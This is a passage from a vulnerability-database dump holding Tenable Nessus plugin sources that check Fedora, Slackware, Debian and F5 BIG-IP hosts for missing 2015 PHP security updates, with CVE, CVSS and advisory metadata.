value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260748\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166357.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6eb2851\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"php-5.6.13-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:36", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to fix security issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-02T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / current : php (SSA:2015-274-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-274-02.NASL", "href": "https://www.tenable.com/plugins/nessus/86223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-274-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86223);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"SSA\", value:\"2015-274-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : php (SSA:2015-274-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.399477\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?933453e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.6.13\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.13\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:25", "description": "Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream versions (5.4.45 and 5.6.13), which include additional bug fixes.\nPlease refer to the upstream changelog for more information :\n\n - https://php.net/ChangeLog-5.php#5.4.45\n - https://php.net/ChangeLog-5.php#5.6.13", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-14T00:00:00", "type": "nessus", "title": "Debian DSA-3358-1 : php5 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3358.NASL", "href": "https://www.tenable.com/plugins/nessus/85914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3358. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85914);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"DSA\", value:\"3358\");\n\n script_name(english:\"Debian DSA-3358-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes.\nPlease refer to the upstream changelog for more information :\n\n - https://php.net/ChangeLog-5.php#5.4.45\n - https://php.net/ChangeLog-5.php#5.6.13\"\n );\n # https://php.net/ChangeLog-5.php#5.4.45\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secure.php.net/ChangeLog-5.php#5.4.45\"\n );\n # https://php.net/ChangeLog-5.php#5.6.13\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secure.php.net/ChangeLog-5.php#5.6.13\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3358\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the oldstable distribution (wheezy), these problems have been\nfixed in version 5.4.45-0+deb7u1.\n\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 5.6.13+dfsg-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libphp5-embed\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php-pear\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cgi\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cli\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-common\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-curl\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dbg\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dev\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-enchant\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-fpm\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gd\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gmp\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-imap\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-interbase\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-intl\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-ldap\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mcrypt\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysql\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysqlnd\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-odbc\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pgsql\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-phpdbg\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pspell\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-readline\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-recode\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-snmp\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sqlite\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sybase\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-tidy\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xmlrpc\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xsl\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:26:58", "description": "Use after free vulnerability was found in unserialize() function. We can create ZVAL and free it via Serializable::unserialize. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-02T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : PHP vulnerabilities (SOL17377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2019-04-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL17377.NASL", "href": "https://www.tenable.com/plugins/nessus/91433", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL17377.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91433);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"F5 Networks BIG-IP : PHP vulnerabilities (SOL17377)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use after free vulnerability was found in unserialize() function. We\ncan create ZVAL and free it via Serializable::unserialize. However the\nunserialize() will still allow to use R: or r: to set references to\nthat already freed memory. It is possible to use-after-free attack and\nexecute arbitrary code remotely.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17377\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL17377.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL17377\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.4.0-11.5.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = 